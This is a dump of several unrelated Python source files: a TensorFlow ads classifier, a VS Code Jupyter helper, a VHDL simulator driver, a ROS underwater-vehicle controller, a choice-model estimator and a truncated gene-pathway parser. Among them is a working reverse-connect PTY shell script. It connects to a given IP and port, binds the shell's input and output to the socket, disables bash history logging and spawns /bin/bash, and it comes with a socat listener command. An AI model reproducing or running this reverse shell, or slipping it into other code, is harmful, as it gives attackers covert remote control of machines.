content stringlengths 5 1.05M |
|---|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import shutil
import sys
import tempfile
import pandas as pd
from six.moves import urllib
import tensorflow as tf
from data_utils import read_data
from data_utils import read_data_with_sampling
import codecs
isbuyer = tf.feature_column.numeric_column("isbuyer")
buy_freq = tf.feature_column.categorical_column_with_hash_bucket("buy_freq", hash_bucket_size=16, dtype=tf.int64)
visit_freq = tf.feature_column.categorical_column_with_hash_bucket("visit_freq", hash_bucket_size=100, dtype=tf.int64)
buy_interval = tf.feature_column.numeric_column("buy_interval")
sv_interval = tf.feature_column.numeric_column("sv_interval")
expected_time_buy = tf.feature_column.numeric_column("expected_time_buy")
expected_time_visit = tf.feature_column.numeric_column("expected_time_visit")
last_buy = tf.feature_column.categorical_column_with_hash_bucket("last_buy", hash_bucket_size=200, dtype=tf.int64)
last_visit = tf.feature_column.categorical_column_with_hash_bucket("last_visit", hash_bucket_size=200, dtype=tf.int64)
multiple_buy = tf.feature_column.numeric_column("multiple_buy")
multiple_visit = tf.feature_column.numeric_column("multiple_visit")
uniq_urls = tf.feature_column.categorical_column_with_hash_bucket("uniq_urls", hash_bucket_size=256, dtype=tf.int64)
num_checkins = tf.feature_column.categorical_column_with_hash_bucket("num_checkins", hash_bucket_size=37200, dtype=tf.int64)
# Wide columns and deep columns.
base_columns = [isbuyer, buy_freq, visit_freq, last_buy, last_visit, multiple_buy, multiple_visit, uniq_urls, num_checkins]
crossed_columns = [
tf.feature_column.crossed_column(["isbuyer", "buy_freq"], hash_bucket_size=1000),
tf.feature_column.crossed_column(["buy_freq", "visit_freq"], hash_bucket_size=1000),
tf.feature_column.crossed_column(["buy_interval", "sv_interval"], hash_bucket_size=1000),
tf.feature_column.crossed_column(["expected_time_buy", "expected_time_visit"], hash_bucket_size=1000),
tf.feature_column.crossed_column(["last_buy", "last_visit"], hash_bucket_size=1000),
tf.feature_column.crossed_column(["uniq_urls", "num_checkins"], hash_bucket_size=1000),
tf.feature_column.crossed_column(["visit_freq", "last_visit", ], hash_bucket_size=1000),
tf.feature_column.crossed_column(["buy_freq", "last_buy", ], hash_bucket_size=1000),
tf.feature_column.crossed_column(["buy_freq", "expected_time_buy", "last_buy", "multiple_buy"], hash_bucket_size=1000),
tf.feature_column.crossed_column(["visit_freq", "expected_time_visit", "last_visit", "multiple_visit"], hash_bucket_size=1000)
]
deep_columns = [isbuyer,
tf.feature_column.embedding_column(buy_freq, dimension=4),
tf.feature_column.embedding_column(visit_freq, dimension=8),
buy_interval, sv_interval, expected_time_buy, expected_time_visit,
tf.feature_column.embedding_column(last_buy, dimension=8),
tf.feature_column.embedding_column(last_visit, dimension=8),
tf.feature_column.embedding_column(uniq_urls, dimension=8),
tf.feature_column.embedding_column(num_checkins, dimension=16)]
def build_model(model_dir, model_type):
if model_type == "wide":
m = tf.estimator.LinearClassifier(
model_dir=model_dir, feature_columns=base_columns + crossed_columns)
elif model_type == "deep":
m = tf.estimator.DNNClassifier(
model_dir=model_dir,
feature_columns=deep_columns,
hidden_units=[100, 50])
else:
m = tf.estimator.DNNLinearCombinedClassifier(
model_dir=model_dir,
linear_feature_columns=base_columns + crossed_columns,
dnn_feature_columns=deep_columns,
dnn_hidden_units=[100, 50])
return m
def train_and_eval(model_dir, model_type, train_steps, train_file_name, valid_file_name, test_file_name, result_file):
model_dir = tempfile.mkdtemp() if not model_dir else model_dir
m = build_model(model_dir, model_type)
# set num_epochs to None to get infinite stream of data.
rf = codecs.open(result_file, mode='w', encoding='utf-8')
session_config = tf.ConfigProto(allow_soft_placement=True)
session_config.gpu_options.allow_growth=True
with tf.Session(config=session_config) as sess:
#m.train(input_fn=read_data(train_file_name, num_epochs=None, shuffle=True), steps=train_steps)
m.train(input_fn=read_data_with_sampling(train_file_name, num_epochs=None, shuffle=True), steps=train_steps)
eval_result = m.evaluate(input_fn=read_data(valid_file_name, num_epochs=1, shuffle=False), steps=None)
print("model directory = %s" % model_dir)
for key in sorted(eval_result):
print("%s: %s" % (key, eval_result[key]))
predictions = m.predict(input_fn=read_data(test_file_name, num_epochs=1, shuffle=False), predict_keys="classes")
predictions = list(predictions)
for p in predictions:
rf.write(str(p["classes"][0] ,encoding='utf-8'))
rf.write("\n")
FLAGS = None
def main(_):
train_and_eval(FLAGS.model_dir + "_" + FLAGS.model_type, FLAGS.model_type, FLAGS.train_steps, FLAGS.train_data, FLAGS.valid_data, FLAGS.test_data, FLAGS.model_type + "_" + FLAGS.result_file)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.register("type", "bool", lambda v: v.lower() == "true")
parser.add_argument(
"--model_dir",
type=str,
default="./model/model",
help="Base directory for output models."
)
parser.add_argument(
"--model_type",
type=str,
default="wide_n_deep",
help="Valid model types: {'wide', 'deep', 'wide_n_deep'}."
)
parser.add_argument(
"--train_steps",
type=int,
default=5000,
help="Number of training steps."
)
parser.add_argument(
"--train_data",
type=str,
default="./data/train.csv",
help="Path to the training data."
)
parser.add_argument(
"--valid_data",
type=str,
default="./data/valid.csv",
help="Path to the valid data."
)
parser.add_argument(
"--test_data",
type=str,
default="./data/ads_test.csv",
#default="./data/valid.csv",
help="Path to the test data."
)
parser.add_argument(
"--result_file",
type=str,
default="result.csv",
help="Path to the result data."
)
FLAGS, unparsed = parser.parse_known_args()
tf.app.run(main=main, argv=[sys.argv[0]] + unparsed)
|
# Query Jupyter server for the info about a dataframe
import json as _VSCODE_json
import pandas as _VSCODE_pd
# _VSCode_sub_supportsDataExplorer will contain our list of data explorer supported types
_VSCode_supportsDataExplorer = "['list', 'Series', 'dict', 'ndarray', 'DataFrame']"
# In IJupyterVariables.getValue this '_VSCode_JupyterTestValue' will be replaced with the json stringified value of the target variable
# Indexes off of _VSCODE_targetVariable need to index types that are part of IJupyterVariable
_VSCODE_targetVariable = _VSCODE_json.loads('_VSCode_JupyterTestValue')
# First check to see if we are a supported type, this prevents us from adding types that are not supported
# and also keeps our types in sync with what the variable explorer says that we support
if _VSCODE_targetVariable['type'] not in _VSCode_supportsDataExplorer:
del _VSCode_supportsDataExplorer
print(_VSCODE_json.dumps(_VSCODE_targetVariable))
del _VSCODE_targetVariable
else:
del _VSCode_supportsDataExplorer
_VSCODE_evalResult = eval(_VSCODE_targetVariable['name'])
# First list out the columns of the data frame (assuming it is one for now)
_VSCODE_columnTypes = []
_VSCODE_columnNames = []
if _VSCODE_targetVariable['type'] == 'list':
_VSCODE_evalResult = _VSCODE_pd.DataFrame(_VSCODE_evalResult)
_VSCODE_columnTypes = list(_VSCODE_evalResult.dtypes)
_VSCODE_columnNames = list(_VSCODE_evalResult)
elif _VSCODE_targetVariable['type'] == 'Series':
_VSCODE_evalResult = _VSCODE_pd.Series.to_frame(_VSCODE_evalResult)
_VSCODE_columnTypes = list(_VSCODE_evalResult.dtypes)
_VSCODE_columnNames = list(_VSCODE_evalResult)
elif _VSCODE_targetVariable['type'] == 'dict':
_VSCODE_evalResult = _VSCODE_pd.Series(_VSCODE_evalResult)
_VSCODE_evalResult = _VSCODE_pd.Series.to_frame(_VSCODE_evalResult)
_VSCODE_columnTypes = list(_VSCODE_evalResult.dtypes)
_VSCODE_columnNames = list(_VSCODE_evalResult)
elif _VSCODE_targetVariable['type'] == 'ndarray':
_VSCODE_evalResult = _VSCODE_pd.DataFrame(_VSCODE_evalResult)
_VSCODE_columnTypes = list(_VSCODE_evalResult.dtypes)
_VSCODE_columnNames = list(_VSCODE_evalResult)
elif _VSCODE_targetVariable['type'] == 'DataFrame':
_VSCODE_columnTypes = list(_VSCODE_evalResult.dtypes)
_VSCODE_columnNames = list(_VSCODE_evalResult)
# Make sure we have an index column (see code in getJupyterVariableDataFrameRows.py)
if 'index' not in _VSCODE_columnNames:
_VSCODE_columnNames.insert(0, 'index')
_VSCODE_columnTypes.insert(0, 'int64')
# Then loop and generate our output json
_VSCODE_columns = []
for _VSCODE_n in range(0, len(_VSCODE_columnNames)):
_VSCODE_column_name = _VSCODE_columnNames[_VSCODE_n]
_VSCODE_column_type = _VSCODE_columnTypes[_VSCODE_n]
_VSCODE_colobj = {}
_VSCODE_colobj['key'] = _VSCODE_column_name
_VSCODE_colobj['name'] = _VSCODE_column_name
_VSCODE_colobj['type'] = str(_VSCODE_column_type)
_VSCODE_columns.append(_VSCODE_colobj)
del _VSCODE_column_name
del _VSCODE_column_type
del _VSCODE_columnNames
del _VSCODE_columnTypes
# Save this in our target
_VSCODE_targetVariable['columns'] = _VSCODE_columns
del _VSCODE_columns
# Figure out shape if not already there. Use the shape to compute the row count
if (hasattr(_VSCODE_evalResult, "shape")):
_VSCODE_targetVariable['rowCount'] = _VSCODE_evalResult.shape[0]
elif _VSCODE_targetVariable['type'] == 'list':
_VSCODE_targetVariable['rowCount'] = len(_VSCODE_evalResult)
else:
_VSCODE_targetVariable['rowCount'] = 0
# Transform this back into a string
print(_VSCODE_json.dumps(_VSCODE_targetVariable))
del _VSCODE_targetVariable |
# EMACS settings: -*- tab-width: 2; indent-tabs-mode: t; python-indent-offset: 2 -*-
# vim: tabstop=2:shiftwidth=2:noexpandtab
# kate: tab-width 2; replace-tabs off; indent-width 2;
#
# ==============================================================================
# Authors: Patrick Lehmann
# Martin Zabel
#
# Python Module: Mentor QuestaSim simulator.
#
# License:
# ==============================================================================
# Copyright 2007-2016 Technische Universitaet Dresden - Germany
# Chair of VLSI-Design, Diagnostics and Architecture
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
#
# load dependencies
from pathlib import Path
from textwrap import dedent
from Base.Project import FileTypes, ToolChain, Tool
from DataBase.Config import Vendors
from ToolChains.Mentor.QuestaSim import QuestaSim, QuestaSimException
from Simulator import VHDL_TESTBENCH_LIBRARY_NAME, SimulatorException, SkipableSimulatorException, SimulationSteps, Simulator as BaseSimulator
__api__ = [
'Simulator'
]
__all__ = __api__
class Simulator(BaseSimulator):
TOOL_CHAIN = ToolChain.Mentor_QuestaSim
TOOL = Tool.Mentor_vSim
def __init__(self, host, dryRun, simulationSteps):
# A separate elaboration step is not implemented in QuestaSim
simulationSteps &= ~SimulationSteps.Elaborate
super().__init__(host, dryRun, simulationSteps)
vSimSimulatorFiles = host.PoCConfig['CONFIG.DirectoryNames']['QuestaSimFiles']
self.Directories.Working = host.Directories.Temp / vSimSimulatorFiles
self.Directories.PreCompiled = host.Directories.PreCompiled / vSimSimulatorFiles
if (SimulationSteps.CleanUpBefore in self._simulationSteps):
pass
if (SimulationSteps.Prepare in self._simulationSteps):
self._PrepareSimulationEnvironment()
self._PrepareSimulator()
def _PrepareSimulator(self):
# create the QuestaSim executable factory
self.LogVerbose("Preparing Mentor simulator.")
# for sectionName in ['INSTALL.Mentor.QuestaSim', 'INSTALL.Mentor.ModelSim', 'INSTALL.Altera.ModelSim']:
# if (len(self.Host.PoCConfig.options(sectionName)) != 0):
# break
# else:
# XXX: check SectionName if ModelSim is configured
# raise NotConfiguredException(
# "Neither Mentor Graphics QuestaSim, ModelSim PE nor ModelSim Altera-Edition are configured on this system.")
# questaSection = self.Host.PoCConfig[sectionName]
# binaryPath = Path(questaSection['BinaryDirectory'])
# version = questaSection['Version']
binaryPath = Path(self.Host.PoCConfig['INSTALL.ModelSim']['BinaryDirectory'])
version = self.Host.PoCConfig['INSTALL.ModelSim']['Version']
self._toolChain = QuestaSim(self.Host.Platform, self.DryRun, binaryPath, version, logger=self.Logger)
def Run(self, testbench, board, vhdlVersion, vhdlGenerics=None):
# TODO: refactor into a ModelSim module, shared by QuestaSim and Cocotb (-> MixIn class)?
# select modelsim.ini
self._modelsimIniPath = self.Directories.PreCompiled
if board.Device.Vendor is Vendors.Altera:
self._modelsimIniPath /= self.Host.PoCConfig['CONFIG.DirectoryNames']['AlteraSpecificFiles']
elif board.Device.Vendor is Vendors.Lattice:
self._modelsimIniPath /= self.Host.PoCConfig['CONFIG.DirectoryNames']['LatticeSpecificFiles']
elif board.Device.Vendor is Vendors.Xilinx:
self._modelsimIniPath /= self.Host.PoCConfig['CONFIG.DirectoryNames']['XilinxSpecificFiles']
self._modelsimIniPath /= "modelsim.ini"
if not self._modelsimIniPath.exists():
raise SimulatorException("Modelsim ini file '{0!s}' not found.".format(self._modelsimIniPath)) \
from FileNotFoundError(str(self._modelsimIniPath))
super().Run(testbench, board, vhdlVersion, vhdlGenerics)
def _RunAnalysis(self, _):
# create a QuestaVHDLCompiler instance
vlib = self._toolChain.GetVHDLLibraryTool()
for lib in self._pocProject.VHDLLibraries:
vlib.Parameters[vlib.SwitchLibraryName] = lib.Name
vlib.CreateLibrary()
# create a QuestaVHDLCompiler instance
vcom = self._toolChain.GetVHDLCompiler()
vcom.Parameters[vcom.FlagQuietMode] = True
vcom.Parameters[vcom.FlagExplicit] = True
vcom.Parameters[vcom.FlagRangeCheck] = True
vcom.Parameters[vcom.SwitchModelSimIniFile] = self._modelsimIniPath.as_posix()
vcom.Parameters[vcom.SwitchVHDLVersion] = repr(self._vhdlVersion)
recompileScriptContent = dedent("""\
puts "Recompiling..."
""")
# run vcom compile for each VHDL file
for file in self._pocProject.Files(fileType=FileTypes.VHDLSourceFile):
if (not file.Path.exists()): raise SimulatorException("Cannot analyse '{0!s}'.".format(file.Path)) from FileNotFoundError(str(file.Path))
vcomLogFile = self.Directories.Working / (file.Path.stem + ".vcom.log")
vcom.Parameters[vcom.SwitchVHDLLibrary] = file.LibraryName
vcom.Parameters[vcom.ArgLogFile] = vcomLogFile
vcom.Parameters[vcom.ArgSourceFile] = file.Path
try:
vcom.Compile()
except QuestaSimException as ex:
raise SimulatorException("Error while compiling '{0!s}'.".format(file.Path)) from ex
if vcom.HasErrors:
raise SkipableSimulatorException("Error while compiling '{0!s}'.".format(file.Path))
# delete empty log files
if (vcomLogFile.stat().st_size == 0):
try:
vcomLogFile.unlink()
except OSError as ex:
raise SimulatorException("Error while deleting '{0!s}'.".format(vcomLogFile)) from ex
# collecting all compile commands in a buffer
recompileScriptContent += dedent("""\
puts " Compiling '{file}'..."
{tcl}
""").format(
file=file.Path.as_posix(),
tcl=vcom.GetTclCommand()
)
recompileScriptContent += dedent("""\
puts "Recompilation done"
puts "Restarting simulation..."
restart -force
puts "Simulation is restarted."
""")
recompileScriptContent = recompileScriptContent.replace("\\", "/") # WORKAROUND: to convert all paths to Tcl compatible paths.
recompileScriptPath = self.Directories.Working / "recompile.do"
self.LogDebug("Writing recompile script to '{0!s}'".format(recompileScriptPath))
with recompileScriptPath.open('w') as fileHandle:
fileHandle.write(recompileScriptContent)
def _RunSimulation(self, testbench):
if (SimulationSteps.ShowWaveform in self._simulationSteps):
return self._RunSimulationWithGUI(testbench)
tclBatchFilePath = self.Host.Directories.Root / self.Host.PoCConfig[testbench.ConfigSectionName]['vSimBatchScript']
tclDefaultBatchFilePath = self.Host.Directories.Root / self.Host.PoCConfig[testbench.ConfigSectionName]['vSimDefaultBatchScript']
# create a QuestaSimulator instance
vsim = self._toolChain.GetSimulator()
vsim.Parameters[vsim.SwitchModelSimIniFile] = self._modelsimIniPath.as_posix()
# vsim.Parameters[vsim.FlagOptimization] = True # FIXME:
vsim.Parameters[vsim.FlagReportAsError] = "3473"
vsim.Parameters[vsim.SwitchTimeResolution] = "1fs"
vsim.Parameters[vsim.FlagCommandLineMode] = True
vsim.Parameters[vsim.SwitchTopLevel] = "{0}.{1}".format(VHDL_TESTBENCH_LIBRARY_NAME, testbench.ModuleName)
# find a Tcl batch script for the BATCH mode
vsimBatchCommand = ""
if (tclBatchFilePath.exists()):
self.LogDebug("Found Tcl script for BATCH mode: '{0!s}'".format(tclBatchFilePath))
vsimBatchCommand += "do {0};".format(tclBatchFilePath.as_posix())
elif (tclDefaultBatchFilePath.exists()):
self.LogDebug("Falling back to default Tcl script for BATCH mode: '{0!s}'".format(tclDefaultBatchFilePath))
vsimBatchCommand += "do {0};".format(tclDefaultBatchFilePath.as_posix())
else:
raise QuestaSimException("No Tcl batch script for BATCH mode found.") \
from FileNotFoundError(str(tclDefaultBatchFilePath))
vsim.Parameters[vsim.SwitchBatchCommand] = vsimBatchCommand
testbench.Result = vsim.Simulate()
def _RunSimulationWithGUI(self, testbench):
tclGUIFilePath = self.Host.Directories.Root / self.Host.PoCConfig[testbench.ConfigSectionName]['vSimGUIScript']
tclWaveFilePath = self.Host.Directories.Root / self.Host.PoCConfig[testbench.ConfigSectionName]['vSimWaveScript']
tclDefaultGUIFilePath = self.Host.Directories.Root / self.Host.PoCConfig[testbench.ConfigSectionName]['vSimDefaultGUIScript']
tclDefaultWaveFilePath = self.Host.Directories.Root / self.Host.PoCConfig[testbench.ConfigSectionName]['vSimDefaultWaveScript']
# create a QuestaSimulator instance
vsim = self._toolChain.GetSimulator()
vsim.Parameters[vsim.SwitchModelSimIniFile] = self._modelsimIniPath.as_posix()
# vsim.Parameters[vsim.FlagOptimization] = True # FIXME:
vsim.Parameters[vsim.FlagReportAsError] = "3473"
vsim.Parameters[vsim.SwitchTimeResolution] = "1fs"
vsim.Parameters[vsim.FlagGuiMode] = True
vsim.Parameters[vsim.SwitchTopLevel] = "{0}.{1}".format(VHDL_TESTBENCH_LIBRARY_NAME, testbench.ModuleName)
# vsim.Parameters[vsim.SwitchTitle] = testbenchName
vsimDefaultWaveCommands = "add wave *"
# find a Tcl batch script to load predefined signals in the waveform window
vsimBatchCommand = ""
self.LogDebug("'{0!s}'\n '{1!s}'".format(tclWaveFilePath, self.Host.Directories.Root))
if (tclWaveFilePath != self.Host.Directories.Root):
if (tclWaveFilePath.exists()):
self.LogDebug("Found waveform script: '{0!s}'".format(tclWaveFilePath))
vsimBatchCommand = "do {0};".format(tclWaveFilePath.as_posix())
elif (tclDefaultWaveFilePath != self.Host.Directories.Root):
if (tclDefaultWaveFilePath.exists()):
self.LogDebug("Found default waveform script: '{0!s}'".format(tclDefaultWaveFilePath))
vsimBatchCommand = "do {0};".format(tclDefaultWaveFilePath.as_posix())
else:
self.LogDebug("Couldn't find default waveform script: '{0!s}'. Loading default command '{1}'.".format(tclDefaultWaveFilePath, vsimDefaultWaveCommands))
vsimBatchCommand = "{0};".format(vsimDefaultWaveCommands)
else:
self.LogDebug("Couldn't find waveform script: '{0!s}'. Loading default command '{1}'.".format(tclWaveFilePath, vsimDefaultWaveCommands))
vsim.Parameters[vsim.SwitchBatchCommand] = "{0};".format(vsimDefaultWaveCommands)
elif (tclDefaultWaveFilePath != self.Host.Directories.Root):
if (tclDefaultWaveFilePath.exists()):
self.LogDebug("Falling back to default waveform script: '{0!s}'".format(tclDefaultWaveFilePath))
vsimBatchCommand = "do {0};".format(tclDefaultWaveFilePath.as_posix())
else:
self.LogDebug("Couldn't find default waveform script: '{0!s}'. Loading default command '{1}'.".format(tclDefaultWaveFilePath, vsimDefaultWaveCommands))
vsimBatchCommand = "{0};".format(vsimDefaultWaveCommands)
else:
self.LogWarning("No waveform script specified. Loading default command '{1}'.".format(vsimDefaultWaveCommands))
vsimBatchCommand = "{0};".format(vsimDefaultWaveCommands)
# find a Tcl batch script for the GUI mode
vsimRunScript = ""
if (tclGUIFilePath.exists()):
self.LogDebug("Found Tcl script for GUI mode: '{0!s}'".format(tclGUIFilePath))
vsimRunScript = tclGUIFilePath.as_posix()
vsimBatchCommand += "do {0};".format(vsimRunScript)
elif (tclDefaultGUIFilePath.exists()):
self.LogDebug("Falling back to default Tcl script for GUI mode: '{0!s}'".format(tclDefaultGUIFilePath))
vsimRunScript = tclDefaultGUIFilePath.as_posix()
vsimBatchCommand += "do {0};".format(vsimRunScript)
else:
raise QuestaSimException("No Tcl batch script for GUI mode found.") \
from FileNotFoundError(str(tclDefaultGUIFilePath))
vsim.Parameters[vsim.SwitchBatchCommand] = vsimBatchCommand
# writing a relaunch file
recompileScriptPath = self.Directories.Working / "recompile.do"
relaunchScriptPath = self.Directories.Working / "relaunch.do"
saveWaveformScriptPath = self.Directories.Working / "saveWaveform.do"
relaunchScriptContent = dedent("""\
puts "Loading recompile script '{recompileScript}'..."
do {recompileScript}
puts "Loading run script '{runScript}'..."
do {runScript}
""").format(
recompileScript=recompileScriptPath.as_posix(),
runScript=vsimRunScript
)
self.LogDebug("Writing relaunch script to '{0!s}'".format(relaunchScriptPath))
with relaunchScriptPath.open('w') as fileHandle:
fileHandle.write(relaunchScriptContent)
# writing a saveWaveform file
saveWaveformScriptContent = dedent("""\
puts "Saving waveform settings to '{waveformFile}'..."
write format wave -window .main_pane.wave.interior.cs.body.pw.wf {waveformFile}
""").format(
waveformFile=tclWaveFilePath.as_posix()
)
self.LogDebug("Writing saveWaveform script to '{0!s}'".format(saveWaveformScriptPath))
with saveWaveformScriptPath.open('w') as fileHandle:
fileHandle.write(saveWaveformScriptContent)
testbench.Result = vsim.Simulate()
|
from abc import ABCMeta, abstractmethod
from pyopenproject.business.abstract_service import AbstractService
class PreviewingService(AbstractService):
"""
Class PreviewingService,
service for previewing endpoint
"""
__metaclass__ = ABCMeta
def __init__(self, connection):
super().__init__(connection)
@abstractmethod
def from_markdown(self, text, context=None): raise NotImplementedError
@abstractmethod
def from_plain(self, text): raise NotImplementedError
|
#!/usr/bin/python2
"""
Reverse Connect TCP PTY Shell - v1.0
infodox - insecurety.net (2013)
Gives a reverse connect PTY over TCP.
For an excellent listener use the following socat command:
socat file:`tty`,echo=0,raw tcp4-listen:PORT
Or use the included tcp_pty_shell_handler.py
"""
import os
import pty
import sys
import socket
def main():
if len(sys.argv) < 3:
print("Usage:\n " + sys.argv[0] + " <ip> <port>\n")
exit(1)
rhost = str(sys.argv[1])
rport = int(sys.argv[2])
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((rhost, rport))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
os.putenv("HISTFILE",'/dev/null')
pty.spawn("/bin/bash")
s.close()
if __name__ == "__main__":
main()
|
#!/usr/bin/env python
# Copyright (c) 2016 The UUV Simulator Authors.
# All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import rospy
import numpy as np
from uuv_control_interfaces import DPPIDControllerBase
from uuv_control_msgs.srv import *
class ROV_MBFLController(DPPIDControllerBase):
"""
Modelbased Feedback Linearization Controller
Reference:
Thor I. Fossen 2011
Handbook of Marine Craft Hydrodynamics and Motion Control
"""
_LABEL = 'Model-based Feedback Linearization Controller'
def __init__(self):
DPPIDControllerBase.__init__(self, True)
self._logger.info('Initializing: ' + self._LABEL)
# Control forces and torques
self._tau = np.zeros(6)
# PID control vector
self._pid_control = np.zeros(6)
self._is_init = True
self._last_vel = np.zeros(6)
self._last_t = None
self._logger.info(self._LABEL + ' ready')
def _reset_controller(self):
super(ROV_MBFLController, self).reset_controller()
self._pid_control = np.zeros(6)
self._tau = np.zeros(6)
def update_controller(self):
if not self._is_init:
return False
t = rospy.get_time()
if self._last_t is None:
self._last_t = t
self._last_vel = self._vehicle_model.to_SNAME(self._reference['vel'])
return False
dt = t - self._last_t
if dt <= 0:
self._last_t = t
self._last_vel = self._vehicle_model.to_SNAME(self._reference['vel'])
return False
self._pid_control = self.update_pid()
vel = self._vehicle_model.to_SNAME(self._reference['vel'])
acc = (vel - self._last_vel) / dt
self._vehicle_model._update_damping(vel)
self._vehicle_model._update_coriolis(vel)
self._vehicle_model._update_restoring(q=self._reference['rot'], use_sname=True)
self._tau = np.dot(self._vehicle_model.Mtotal, acc) + \
np.dot(self._vehicle_model.Ctotal, vel) + \
np.dot(self._vehicle_model.Dtotal, vel) + \
self._vehicle_model.restoring_forces
# Publish control forces and torques
self.publish_control_wrench(self._pid_control + self._vehicle_model.from_SNAME(self._tau))
self._last_t = t
self._last_vel = self._vehicle_model.to_SNAME(self._reference['vel'])
return True
if __name__ == '__main__':
print('Starting Modelbased Feedback Linearization Controller')
rospy.init_node('rov_mb_fl_controller')
try:
node = ROV_MBFLController()
rospy.spin()
except rospy.ROSInterruptException:
print('caught exception')
print('exiting')
|
import functools
import torch.nn as nn
from csrank.discrete_choice_losses import CategoricalHingeLossMax
from csrank.discretechoice.discrete_choice import SkorchDiscreteChoiceFunction
from csrank.modules.object_mapping import DenseNeuralNetwork
from csrank.modules.scoring import FATEScoring
class FATEDiscreteChoiceFunction(SkorchDiscreteChoiceFunction):
"""A discrete choice estimator based on the FATE-Approach.
See the documentation of :class:`csrank.modules.scoring.FATEScoring` for
more details.
Parameters
----------
n_hidden_set_layers : int
The number of hidden layers that should be used for the ``DeepSet``
context embedding.
n_hidden_set_untis : int
The number of units per hidden layer that should be used for the
``DeepSet`` context embedding.
n_hidden_joint_layers : int
The number of hidden layers that should be used for the utility
function that evaluates each object in the aggregated context.
n_hidden_joint_units : int
The number of units per hidden layer that should used for the utility
function that evaluates each object in the aggregated context.
activation : torch activation function (class)
The activation function that should be used for each layer of the two
("set" and "joint) neural networks.
choice_size : int
The size of the target choice set.
criterion : torch criterion (class)
The criterion that is used to evaluate and optimize the module.
**kwargs : skorch NeuralNet arguments
All keyword arguments are passed to the constructor of
``SkorchDiscreteChoice``. See the documentation of that class for more
details.
"""
def __init__(
self,
n_hidden_set_layers=2,
n_hidden_set_units=32,
n_hidden_joint_layers=2,
n_hidden_joint_units=32,
activation=nn.SELU,
choice_size=1,
criterion=CategoricalHingeLossMax,
**kwargs
):
self.n_hidden_set_layers = n_hidden_set_layers
self.n_hidden_set_units = n_hidden_set_units
self.n_hidden_joint_layers = n_hidden_joint_layers
self.n_hidden_joint_units = n_hidden_joint_units
self.activation = activation
super().__init__(
module=FATEScoring, criterion=criterion, choice_size=choice_size, **kwargs
)
def _get_extra_module_parameters(self):
"""Return extra parameters that should be passed to the module."""
params = super()._get_extra_module_parameters()
params["pairwise_utility_module"] = functools.partial(
DenseNeuralNetwork,
hidden_layers=self.n_hidden_joint_layers,
units_per_hidden=self.n_hidden_joint_units,
activation=self.activation(),
output_size=1,
)
params["embedding_module"] = functools.partial(
DenseNeuralNetwork,
hidden_layers=self.n_hidden_set_layers,
units_per_hidden=self.n_hidden_set_units,
activation=self.activation(),
)
return params
|
#!/usr/bin/env python
__author__ = 'sreynolds'
## if this is set to 1 there will be a TON of debug output ...
debugFlag = 0
import argparse
import commands
import json
import math
import random
import sys
import time
#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
def cleanUpName ( aName ):
bName = ''
aName = aName.upper()
## ii = aName.find(" - Homo sapiens (human)")
ii = aName.find(" - HOMO SAPIENS (HUMAN)")
if ( ii >= 0 ):
aName = aName[:ii]
aName = aName.strip()
ii = aName.find("(")
while ( ii >= 0 ):
jj = aName.find(")",ii)
aName = aName[:ii] + aName[jj+1:]
ii = aName.find("(")
aName = aName.strip()
ii = aName.find("<")
while ( ii >= 0 ):
jj = aName.find(">",ii)
aName = aName[:ii] + aName[jj+1:]
ii = aName.find("<")
aName = aName.strip()
for ii in range(len(aName)):
if ( aName[ii] == ',' ):
continue
elif ( aName[ii] == '(' ):
bName += '_'
elif ( aName[ii] == ')' ):
bName += '_'
elif ( aName[ii] == '-' ):
bName += '_'
elif ( aName[ii] == '/' ):
bName += '_'
elif ( aName[ii] == ';' ):
bName += '_'
elif ( aName[ii] == '&' ):
continue
elif ( aName[ii] == '#' ):
continue
elif ( aName[ii] == ' ' ):
bName += '_'
else:
bName += aName[ii].upper()
ii = bName.find("__")
while ( ii >= 0 ):
## print " ", ii, bName
bName = bName[:ii] + bName[ii+1:]
## print " ", bName
ii = bName.find("__")
return ( bName )
#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
def readPathways ( pathwaysFilename ):
if ( debugFlag ):
print " in readPathways ... <%s> " % pathwaysFilename
fh = file ( pathwaysFilename, 'r' )
pwDict = {}
for aLine in fh:
aLine = aLine.strip()
aLine = aLine.upper()
tokenList = aLine.split('\t')
if ( len(tokenList) != 3 ): continue
if ( tokenList[0] == "pathway" ): continue
longPathwayName = tokenList[0]
shortPathwayName = tokenList[1]
geneTokens = tokenList[2].strip()
geneList = geneTokens.split(',')
geneList.sort()
if ( len(geneList) > 0 ):
while ( geneList[0] == '' ):
geneList = geneList[1:]
if ( len(geneList) == 0 ): continue
if ( len(geneList) == 0 ): continue
pathwayName = cleanUpName ( shortPathwayName )
pathwayName = pathwayName + "__" + "%d" % len(geneList)
if ( pathwayName not in pwDict.keys() ):
## print " adding pathway %s (%d) " % ( pathwayName, len(geneList) )
pwDict[pathwayName] = geneList
else:
if ( len(pwDict[pathwayName]) < len(geneList) ):
## print " substituting shorter list of genes for %s (%d) " % ( pathwayName, len(geneList) )
pwDict[pathwayName] = geneList
## else:
## print " NOT substituing list for %s " % pathwayName
fh.close()
print "## "
print "## have pathway dictionary with %d pathways " % len(pwDict)
## print " --> now looking for duplicate pathways ... "
pwList = pwDict.keys()
